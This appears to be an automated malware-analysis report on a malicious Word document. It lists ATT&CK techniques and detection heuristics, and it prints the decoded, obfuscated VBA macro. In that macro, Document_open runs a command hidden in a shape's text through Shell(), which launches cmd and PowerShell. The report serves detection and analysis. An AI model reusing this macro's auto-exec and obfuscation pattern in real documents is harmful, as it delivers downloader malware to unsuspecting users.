MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call to execute a command that invokes cmd.exe, which in turn launches PowerShell. This PowerShell command appears to be designed to download and execute a second-stage payload from a remote source, as indicated by the suspicious command structure and the ClamAV detection name 'Doc.Downloader.Valyria-6768931-0'.
Heuristics 9
-
ClamAV: Doc.Downloader.Valyria-6768931-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6768931-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End If aXiBbciYl = Shell(nizhMbTJBj + FZuoND + PDaZo, bAnEVvufKL) If (DwAbTFLCu <> 0 Or WottjB) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() If (zvifGwjz <> 0 Or FiaTz) Then -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4495 bytes |
SHA-256: 5c166e97f4b01013fa010acf9258ba2e9d38a4dced48e2c177d67b132712b06a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
48 of 81 identifiers look randomly generated (e.g. 'cLMwbmJFctwpz') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "cLMwbmJFctwpz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function PHjJOvfi()
Const bAnEVvufKL = 728213473 - 728213473
If (lhTlNZ <> 0 Or BmAbihvDP) Then
BmAbihvDP = True
mnuHSaF = mnuHSaF & Atn(lhTlNZ)
If (lhTlNZ = 1) Then
mnuHSaF = mnuHSaF & "Cojsj"
Else
mnuHSaF = mnuHSaF & "wmbMNHj"
End If
End If
If (MrjSI <> 0 Or fCjobd) Then
fCjobd = True
qMSHNiLkP = qMSHNiLkP & CInt(MrjSI)
If (MrjSI = 1) Then
qMSHNiLkP = qMSHNiLkP & "CdfwF"
Else
qMSHNiLkP = qMSHNiLkP & "pIuvdiPj"
End If
End If
nizhMbTJBj = Shapes(1).TextFrame.ContainingRange
If (WlAEItzvP <> 0 Or GtFiYwjjp) Then
GtFiYwjjp = True
RaTqjjh = RaTqjjh & CByte(WlAEItzvP)
If (WlAEItzvP = 1) Then
RaTqjjh = RaTqjjh & "IwiARmp"
Else
RaTqjjh = RaTqjjh & "PEtkhAppi"
End If
End If
If (QEljCRTa <> 0 Or SJXcLcmTL) Then
SJXcLcmTL = True
bSpah = bSpah & CDbl(QEljCRTa)
If (QEljCRTa = 1) Then
bSpah = bSpah & "nEvQkdHR"
Else
bSpah = bSpah & "QQXQjiwLs"
End If
End If
If (COzfdUpmU <> 0 Or QVaBjr) Then
QVaBjr = True
Zjdtz = Zjdtz & Atn(COzfdUpmU)
If (COzfdUpmU = 1) Then
Zjdtz = Zjdtz & "zDKOik"
Else
Zjdtz = Zjdtz & "BujhHzp"
End If
End If
If (jRYFO <> 0 Or icnWbiD) Then
icnWbiD = True
PMXJL = PMXJL & CInt(jRYFO)
If (jRYFO = 1) Then
PMXJL = PMXJL & "CGlvMODi"
Else
PMXJL = PMXJL & "dHwuczV"
End If
End If
aXiBbciYl = Shell(nizhMbTJBj + FZuoND + PDaZo, bAnEVvufKL)
If (DwAbTFLCu <> 0 Or WottjB) Then
WottjB = True
wQXTFilA = wQXTFilA & CInt(DwAbTFLCu)
If (DwAbTFLCu = 1) Then
wQXTFilA = wQXTFilA & "IOjAc"
Else
wQXTFilA = wQXTFilA & "djDAp"
End If
End If
If (LuXza <> 0 Or OJMfBtdYf) Then
OJMfBtdYf = True
wSObMzw = wSObMzw & CInt(LuXza)
If (LuXza = 1) Then
wSObMzw = wSObMzw & "ulRLJpj"
Else
wSObMzw = wSObMzw & "mmFdvF"
End If
End If
End Function
Private Sub Document_open()
If (zvifGwjz <> 0 Or FiaTz) Then
FiaTz = True
zCEoZC = zCEoZC & CByte(zvifGwjz)
If (zvifGwjz = 1) Then
zCEoZC = zCEoZC & "WwpHqTCis"
Else
zCEoZC = zCEoZC & "TpOBOq"
End If
End If
If (kODkAlSp <> 0 Or jtAPUjzYl) Then
jtAPUjzYl = True
zHNvXNUHd = zHNvXNUHd & CDbl(kODkAlSp)
If (kODkAlSp = 1) Then
zHNvXNUHd = zHNvXNUHd & "LiLQBoow"
Else
zHNvXNUHd = zHNvXNUHd & "vDoBcWpr"
End If
End If
If (RWQQPZz <> 0 Or wYIHlSMPq) Then
wYIHlSMPq = True
OiYmtzAL = OiYmtzAL & Atn(RWQQPZz)
If (RWQQPZz = 1) Then
OiYmtzAL = OiYmtzAL & "RowrVIq"
Else
OiYmtzAL = OiYmtzAL & "XkVaMK"
End If
End If
If (GQccAofXS <> 0 Or WjioGfzh) Then
WjioGfzh = True
NjuBmpmK = NjuBmpmK & CByte(GQccAofXS)
If (GQccAofXS = 1) Then
NjuBmpmK = NjuBmpmK & "lZiWU"
Else
NjuBmpmK = NjuBmpmK & "XRiFL"
End If
End If
PHjJOvfi
If (ZOjpL <> 0 Or sSwzw) Then
sSwzw = True
dSPDDiFz = dSPDDiFz & CByte(ZOjpL)
If (ZOjpL = 1) Then
dSPDDiFz = dSPDDiFz & "mzvEoiUM"
Else
dSPDDiFz = dSPDDiFz & "TMzsY"
End If
End If
If (jFmEYYK <> 0 Or iuSFWJcGp) Then
iuSFWJcGp = True
nPnlXX = nPnlXX & CByte(jFmEYYK)
If (jFmEYYK = 1) Then
nPnlXX = nPnlXX & "Gvdliku"
Else
nPnlXX = nPnlXX & "bXcTuIN"
End If
End If
If (VtMOp <> 0 Or rFHZkWovi) Then
rFHZkWovi = True
hSdhGA = hSdhGA & CInt(VtMOp)
If (VtMOp = 1) Then
hSdhGA = hSdhGA & "Xbvmzn"
Else
hSdhGA = hSdhGA & "KZblPdLIQ"
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.